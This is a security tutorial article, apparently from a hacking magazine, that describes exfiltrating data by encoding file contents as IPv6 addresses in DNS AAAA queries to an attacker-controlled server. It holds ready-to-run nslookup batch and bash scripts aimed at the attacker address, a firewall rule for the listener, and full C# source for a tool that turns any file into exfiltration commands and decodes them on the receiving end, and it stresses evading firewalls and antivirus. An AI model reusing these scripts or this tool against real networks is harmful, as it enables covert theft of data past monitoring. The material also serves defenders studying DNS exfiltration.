Exfiltration and Uploading DATA by DNS Traffic (AAAA Records) | By Damon Mohammadbagher

Exfiltration and Uploading DATA by DNS Traffic (AAAA Records)

Understanding this method

In this chapter, I want to explain how to Send DATA to Attacker Server by DNS AAAA records  and IPv6 Addresses, so this is one way for DATA Exfiltration.

Again, Why DNS protocol?

Because DNS traffic in most networks is available without monitoring or filtering by IPS/IDS or hardware firewalls. In this article, I want to show you one way to exfiltrate DATA by DNS Request, in this case by “AAAA Records” over Network.

How can you do this?

First, you need imagine this payload or text DATA for example:

this is my test for reading File (Bytes) and Making IPV6 AAAA Requests so let me test it ;) by RedBudTree !@#$%^

So, in this technique, I want to use IPv6 addresses as payloads for sending or uploading DATA to DNS Server so we will have IPv6 DNS (AAAA Records) only in our traffic.

Note: in this technique our payloads will inject to IPv6 addresses “128 Bits” in (IPv6 Header) also detecting this method by firewalls or AV is difficult.

So how we can inject these bits to (16 Bytes) IPv6 addresses ?

STEP 1: first of all, we should convert our text to bits; also we should chunk them to (128 bits or 16 bytes):

16 bytes Text == Convert to bytes == > 16 bytes
“this is my test “   == Convert to (16 Bytes or 128 bits) ==>  74 68 69 73 20 69 73 20 6d 79 20 74 65 73 74 20

So we will have something like this:

“t    h I    s I   s m y        t e s t “

 74 68 69 73 20 69 73 20 6d 79 20 74 65 73 74 20

“t” = 74 , “h” = 68 , “I” = 69 , “s” = 73 , “ “ = 20 , “I” = 69 , “s” = 73 , …..

Now you can understand what exactly will happen in this step:

128 bits or 16 bytes Text (DATA)  == Convert Text to bytes == > 128 Bits or 16 Bytes (DATA)

this is my test “ ==> 74686973206973206d79207465737420

for reading File” ==> 666f722072656164696e672046696c65

(Bytes) and Mak” ==> 202842797465732920616e64204d616b

ing IPV6 AAAA Re” ==> 696e6720495056362041414141205265

quests so let m” ==> 7175657374730d0a736f206c6574206d

e test it ;) by “ ==> 652074657374206974203b2920627920

RedBudTree !@#$%” ==> 52656442756454726565202140232425

^ ” ==> 5e20000000000000000

STEP 2: Injecting Bytes to IPV6 Addresses via DNS AAAA Records and Nslookup Command for Exfiltration:

Now we need to think about how we can use these bytes as IPv6 addresses. Also, how can we send these bytes to the attacker’s DNS Server via AAAA Records, using DNS traffic?

We can do this via NSLOOKUP Command:

How?

This time, we will have something like this for sending DATA to Attacker DNS Server.

Note: Attacker DNS Server IPv4 Address is “192.168.56.101”

128 Bits (DATA) == Convert to Text ==> Text (DATA)

  1. Text1: 74686973206973206d79207465737420  ==> “this is my test “
  • sending “Text1” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 7468:6973:2069:7320:6d79:2074:6573:7420   192.168.56.101 | find ""
  1. Text2: 666f722072656164696e672046696c65  ==> “for reading File”
  • sending “Text2” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 666f:7220:7265:6164:696e:6720:4669:6c65   192.168.56.101 | find ""
  1. Text3: 202842797465732920616e64204d616b  ==> “ (Bytes) and Mak”
  • sending “Text3” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 2028:4279:7465:7329:2061:6e64:204d:616b   192.168.56.101 | find ""
  1. Text4: 696e6720495056362041414141205265  ==> “ing IPV6 AAAA Re”
  • sending “Text4” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 696e:6720:4950:5636:2041:4141:4120:5265   192.168.56.101 | find ""
  1. Text5: 7175657374730d0a736f206c6574206d ==> “quests so let m”
  • sending “Text5” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 7175:6573:7473:0d0a:736f:206c:6574:206d   192.168.56.101 | find ""
  1. Text6: 652074657374206974203b2920627920 ==> “e test it ;) by “
  • sending “Text6” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 6520:7465:7374:2069:7420:3b29:2062:7920   192.168.56.101 | find ""
  1. Text7: 52656442756454726565202140232425  ==> “RedBudTree !@#$%”
  • sending “Text7” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 5265:6442:7564:5472:6565:2021:4023:2425   192.168.56.101 | find ""
  1. Text8: 5e20000000000000000 ==> “^ ”
  • sending “Text8” via DNS AAAA Records to Attacker DNS Server and Nslookup Command for this is:
    • nslookup -type=aaaa 5e20:0:0:0:0:0:0:0   192.168.56.101 | find ""

So, for sending or uploading (exfiltration) this text or (DATA): “this is my test for reading File (Bytes) and Making IPV6 AAAA Requests so let me test it ;) by RedBudTree !@#$%^ ” to Attacker DNS Server with IPv4 Address 192.168.56.101 via DNS AAAA Records, we need these Nslookup Commands as you can see in “Dns.bat” file:

Dns.bat file :

nslookup -type=aaaa  7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | find ""

nslookup -type=aaaa  666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | find ""

nslookup -type=aaaa  2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | find ""

nslookup -type=aaaa  696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | find ""

nslookup -type=aaaa  7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | find ""

nslookup -type=aaaa  6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | find ""

nslookup -type=aaaa  5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | find ""

nslookup -type=aaaa  5e20:0:0:0:0:0:0:0 192.168.56.101 | find ""

Or in Linux with Bash script :

#!/bin/bash

nslookup -type=aaaa  7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | grep "";

nslookup -type=aaaa  666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | grep "";

nslookup -type=aaaa  2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | grep "";

nslookup -type=aaaa  696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | grep "";

nslookup -type=aaaa  7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | grep "";

nslookup -type=aaaa  6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | grep "";

nslookup -type=aaaa  5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | grep "";

nslookup -type=aaaa  5e20:0:0:0:0:0:0:0 192.168.56.101 | grep "";

Note: to use this Bash script for Linux (Step5: Client Side), you should change “find” to “grep” manually and it means you can use this bash script in (Step5: Client side) with a Linux based system and your (Attacker Side) will be a Windows Based System. If you used a Linux based System as Client-Side for sending DATA via this Bash script you will have something like “Picture 3” in attacker-side with “Listening Mode” in a Windows based system.

Now, in Attacker Side, an attacker can dump these bytes very simply just with monitoring DNS Log files or monitoring DNS AAAA Queries. You can also do this without a DNS Server, it means you can do this only by Monitoring UDP Port 53 for IPv4 192.168.56.101 so I did this by this method and I made one C# Code “RedbudTree.cs” for making these Nslookup command for sending DATA also by this code you can Have monitoring Mode over UDP Port 53 for Listening to DNS Queries so by this code you can Upload your DATA also with this code with “Listening Mode” you can dump DATA in attacker Side.

Note: In this article, I do not want to explain C# code line by line but I will show you how you can work very simply with this code and this tool.

Using RedbudTree.exe tool – step by step :

Step 1: first you need to compile C# code with this Command (RunAs Admin):

  • c:\> csc.exe /out:RedbudTree.exe  RedbudTree.cs

Step 2 (Client Side): in this step you need to make Nslookup Commands for Exfiltration with the “RedbudTree.exe” tool.

To do this, you can use Switch “AAAA and File “ like this syntax :

  • Syntax: RedbudTree.exe aaaa file File-Name.txt
  • Example: RedbudTree.exe aaaa file Test.txt

As you can see in “Picture 1”, I made one text file “Test.txt”. I also made Nslookup commands for sending this text file via DNS AAAA Records and DNS Traffic by “ RedbudTree.exe AAAA FILE TEST.TXT ” command.

So my output was something like these commands:

nslookup -type=aaaa  7468:6973:2069:7320:6d79:2074:6573:7420 192.168.56.101 | find ""

nslookup -type=aaaa  666f:7220:7265:6164:696e:6720:4669:6c65 192.168.56.101 | find ""

nslookup -type=aaaa  2028:4279:7465:7329:2061:6e64:204d:616b 192.168.56.101 | find ""

nslookup -type=aaaa  696e:6720:4950:5636:2041:4141:4120:5265 192.168.56.101 | find ""

nslookup -type=aaaa  7175:6573:7473:0d0a:736f:206c:6574:206d 192.168.56.101 | find ""

nslookup -type=aaaa  6520:7465:7374:2069:7420:3b29:2062:7920 192.168.56.101 | find ""

nslookup -type=aaaa  5265:6442:7564:5472:6565:2021:4023:2425 192.168.56.101 | find ""

nslookup -type=aaaa  5e20

As you can see, I had eight command lines and in the last line, I had this one:

  • nslookup -type=aaaa  5e20

So in this line, you should change this command to this one manually:

  • nslookup -type=aaaa  5e20:0:0:0:0:0:0:0 192.168.56.101 | find “”

Why?

Because for each IPv6 address, you need something like this :

IPv6        : xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx:xxxx

Example :   5265:6442:7564:5472:6565:2021:4023:2425

In this case, our IPv6 was 5e20:x:x:x:x:x:x:x and we should change it to 5e20:0:0:0:0:0:0:0 manually. In this step, you should copy these eight lines to one “BAT” file, for example, “Demo.bat”.

Picture 1

Step 3 (Attacker Side): in this step, you need to use RedbudTree.exe for “Listening Mode” in Attacker side for Receiving Queries but before that you need to use this command with “RunAs Admin” in your Windows for opening UDP Port 53 in firewall.

To use “Listener Mode” UDP Port 53 should be opened before using this tool and Windows command for opening UDP port 53 is (RunAs Admin):  

  • netsh advfirewall firewall add rule name="UDP 53" dir=in action=allow protocol=UDP localport=53

Step 4 (Attacker Side): in this step, you can use RedbudTree.exe tool for listening DNS Queries in Attacker Side “Listening Mode” or (DNS Queries Listener) so this time you should run this tool without using the switch:

  • C:\> RedbudTree.exe

Step 5 (Client Side): Finally, in this step, you can run Nslookup Commands by “Demo.bat” file in client Side for uploading DATA via DNS AAAA Records and DNS Traffic to Attacker Server in this case “192.168.56.101” or (DNS Queries Listener).

As you can see in “Picture 2” we will get DNS Queries via Monitoring (UDP Port 53) after we execute “Demo.bat”.

Picture 2

Picture 3

At a glance: IPv6 traffic is a good way for DATA exfiltration and in this method, you can use IPv6 Addresses as payload for DATA transferring or DATA Exfiltration to Attacker DNS Server or (Fake DNS Server) also, detecting this method is difficult when you want to use DNS AAAA records as payload.

using System;

using System.Collections.Generic;

using System.Net;

using System.Net.Sockets;

using System.Text;

namespace RedbudTree

{

   class Program

   {

       /// <summary>

       /// RedbudTree v1.0 , IPv6 DNS Request Listener (UDP Port 53)

       /// Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests

       ///

       /// DNS IPv6 Requests tested by nslookup command in Win2008 R2 and Kali linux.

       /// RedbudTree Listener Mode tested in Win2008 R2 + .NET Framework 2.0

       ///

       /// for using "Listener Mode" UDP Port 53 should be opened before using this tool.         

       /// windows command for opening UDP port 53 is :  

       /// netsh advfirewall firewall add rule name="UDP 53" dir=in action=allow protocol=UDP localport=53

       ///

       /// [!] Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup

       /// [!] Syntax 1: RedbudTree.exe "AAAA" "Text"

       /// [!] Example1: RedbudTree.exe AAAA "this is my test"

       ///

       /// [!] Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files

       /// [!] Syntax 2: RedbudTree.exe "AAAA" "FILE" "TextFile.txt"

       /// [!] Example2: RedbudTree.exe AAAA FILE "TextFile.txt"

       ///

       /// [!] Syntax 3: RedbudTree with Listening Mode

       /// [!] Syntax 3: RedbudTree.exe        

       ///

       /// </summary>

       public static int counter = 0;

       public static UdpClient UDP_53_Init = new UdpClient(53);

       public static void Async_UDP_Data_Receive(IAsyncResult AsyncResult)

       {              

           IPEndPoint LocalIP_UdpPort53 = new IPEndPoint(IPAddress.Any,53);

           byte[] UDP_Rec_Bytes = UDP_53_Init.EndReceive(AsyncResult, ref LocalIP_UdpPort53);            

                     

           bool isIPV6 = false;           

           string UDP_DATA = Encoding.ASCII.GetString(UDP_Rec_Bytes);

           if (UDP_DATA.ToUpper().Contains("IP6"))

           {

               isIPV6 = true;

               counter++;

               Console.WriteLine("[{1}] [{0}] IPv6 DNS Request Received : ", DateTime.Now.ToString(),counter.ToString());

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               /// Debug Mode

               //Console.WriteLine(BitConverter.ToString(bytes));               

           }

           if (isIPV6)

           {

               Console.ForegroundColor = ConsoleColor.DarkGreen;

               Console.Write("[{0}] IPv6 DNS Bytes is :  ", DateTime.Now.ToString());

               char[] Temp = new char[UDP_DATA.Length];

               int c = 0;                

               foreach (char item in UDP_DATA)

               {

                   if (Convert.ToInt32(item) > 16)

                   {

                       Console.ForegroundColor = ConsoleColor.Green;

                       Console.Write(item);

                       Temp[c] = item;                        

                   }

                   else

                   {

                       Console.ForegroundColor = ConsoleColor.DarkGreen;

                       Console.Write(item);

                   }

                   c++;

               }

               int cc = Temp.Length;

               bool init = false;

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkGreen;

               Console.Write("[{0}] IPv6 DNS Request is : ", DateTime.Now.ToString());

               Console.ForegroundColor = ConsoleColor.Green;

               string _Raw = "";

               int BreakTime = 0;

               for (int jj = cc - 1; jj >= 0; jj--)

               {

                   if (init)

                   {     

                       Console.Write(Temp[jj]);

                       if (Temp[jj] != '\0') _Raw += Temp[jj];

                   }

                   if (Temp[jj] == 'i') init = true;                   

                   if (BreakTime > 75) break;

                   BreakTime++;

               }

               

               /// Debug

               //Console.WriteLine("\n" + _Raw);

               byte[] RAW = new byte[16];

               int kk = 0;

               for (int k = 0; k < _Raw.Length / 2;)

               {

                   RAW[k] = byte.Parse(_Raw.Substring(kk, 2), System.Globalization.NumberStyles.HexNumber);

                   k++;

                   kk++;

                   kk++;

               }

               Console.ForegroundColor = ConsoleColor.DarkGreen;

               Console.WriteLine();

               Console.Write("[{0}] Dumping DATA from this IPv6 Address :", DateTime.Now.ToString());

               Console.ForegroundColor = ConsoleColor.Green;

               Console.Write(UTF8Encoding.ASCII.GetChars(RAW));

               Console.WriteLine();                

           }

          

           Console.WriteLine();

           Console.ForegroundColor = ConsoleColor.Gray;         

       }

       public static void Create_IPv6_Address(string input_Exfil_String_DATA ,bool _isFile)

       {

          

           try

           {

               string ExfiltrationText = "";

               Console.ForegroundColor = ConsoleColor.Red;

               Console.WriteLine("Your Target (UDP Port 53) Listener IPv4 Address is 192.168.56.101 you can change it manually.");

               if (_isFile)

               {

                   Console.WriteLine("Your Exfiltration Nslookup Commands for File \"{0}\" are:", input_Exfil_String_DATA);

                   byte[] FileBytes = System.IO.File.ReadAllBytes(input_Exfil_String_DATA);

                   ExfiltrationText = UTF8Encoding.ASCII.GetString(FileBytes);

               }

               if(!_isFile)

               {

                   Console.WriteLine("Your Exfiltration Nslookup Commands are:");

                   byte[] TextBytes = UnicodeEncoding.ASCII.GetBytes(input_Exfil_String_DATA);

                   ExfiltrationText = UTF8Encoding.ASCII.GetString(TextBytes);

               }

               Console.ForegroundColor = ConsoleColor.Gray;

               Console.WriteLine();              

               byte[] b = new byte[ExfiltrationText.Length];

               int i = 0;

               int c = 1;

               int cc = 1;

               Console.Write("nslookup -type=aaaa ");

               foreach (char item in ExfiltrationText)

               {

                   b[i] = Convert.ToByte(item);

                   if (cc > 2) { Console.Write(":"); cc = 1; }

                   Console.Write(string.Format("{0:x2}", b[i]));

                   if (c == 16)

                   {

                       Console.Write(" 192.168.56.101 | find \"\"");

                       Console.WriteLine();

                       Console.Write("nslookup -type=aaaa ");

                       c = 0;

                       cc = 0;

                   }

                   i++;

                   c++;

                   cc++;

               }

               Console.WriteLine();

           }

           catch (Exception omg)

           {

               Console.WriteLine(omg.Message);

           }

       }

       static void Main(string[] args)

       {

           /// Exfiltration and uploading DATA by Sending IPv6 DNS Request to Attacker DNS Server

           /// in this case you can Uploading DATA by IPv6 Addresses      

           Console.ForegroundColor = ConsoleColor.DarkGray;

           Console.WriteLine();

           Console.WriteLine("RedbudTree , IPv6 DNS Request Listener (UDP Port 53)");

           Console.WriteLine("Detecting Exfiltration DATA via IPv6 DNS AAAA Record Requests");

           Console.ForegroundColor = ConsoleColor.Gray;

           Console.WriteLine("Published by Damon Mohammadbagher Oct-Nov 2017");

           Console.WriteLine();

           if (args.Length >= 1 && args[0].ToUpper() == "HELP")

           {

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 1: RedbudTree.exe \"AAAA\" \"Text\"");

               Console.WriteLine("[!] Example1: RedbudTree.exe AAAA \"this is my test\"");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 2: RedbudTree.exe \"AAAA\" \"FILE\" \"TextFile.txt\"");

               Console.WriteLine("[!] Example2: RedbudTree.exe AAAA FILE \"TextFile.txt\"");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 3: Listening Mode");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 3: RedbudTree.exe ");

               Console.WriteLine("[!] Example3: RedbudTree.exe ");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.Gray;

           }

           else if (args.Length == 2 && args[0].ToUpper() == "AAAA")

           {

               try

               {

                   Create_IPv6_Address(args[1], false);

                   Console.WriteLine();

               }

               catch (Exception omg)

               {

                   Console.WriteLine(omg.Message);

               }

           }

           else if (args.Length == 3 && args[0].ToUpper() == "AAAA" && args[1].ToUpper() == "FILE")

           {

               try

               {

                   Create_IPv6_Address(args[2], true);

                   Console.WriteLine();

               }

               catch (Exception omg)

               {

                   Console.WriteLine(omg.Message);

               }

           }

           else if (args.Length == 0)

           {

               Console.ForegroundColor = ConsoleColor.Yellow;

               Console.WriteLine("[!] UDP Port 53 Listening Mode");

               Console.ForegroundColor = ConsoleColor.Gray;

               while (true)

               {

                   try

                   {

                       UDP_53_Init.BeginReceive(Async_UDP_Data_Receive, new object());

                       System.Threading.Thread.Sleep(1000);

                   }

                   catch (Exception omg)

                   {

                       Console.WriteLine("[!] Maybe you need to this command before Running RedBudTree \"Listening Mode\" :");

                       Console.WriteLine("[!] netsh advfirewall firewall add rule name=\"UDP 53\" dir=in action=allow protocol=UDP localport=53");

                       Console.WriteLine("[X] " + omg.Message);

                   }

               }

           }

           else

           {

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 1: Creating Exfiltration DATA via IPv6 Address and Nslookup");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 1: RedbudTree.exe \"AAAA\" \"Text\"");

               Console.WriteLine("[!] Example1: RedbudTree.exe AAAA \"this is my test\"");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 2: Creating Exfiltration DATA via IPv6 Address and Nslookup by Text Files");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 2: RedbudTree.exe \"AAAA\" \"FILE\" \"TextFile.txt\"");

               Console.WriteLine("[!] Example2: RedbudTree.exe AAAA FILE \"TextFile.txt\"");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.DarkCyan;

               Console.WriteLine("[!] Syntax 3: Listening Mode");

               Console.ForegroundColor = ConsoleColor.Cyan;

               Console.WriteLine("[!] Syntax 3: RedbudTree.exe ");

               Console.WriteLine("[!] Example3: RedbudTree.exe ");

               Console.WriteLine();

               Console.ForegroundColor = ConsoleColor.Gray;

           }

       }

   }

}

Originally posted here: https://bsdmag.org/download/table-level-security-postgresql/

August 3, 2018

Leave a Reply

This site uses Akismet to reduce spam. Learn how your comment data is processed.

  Subscribe  
Notify of
© HAKIN9 MEDIA SP. Z O.O. SP. K. 2013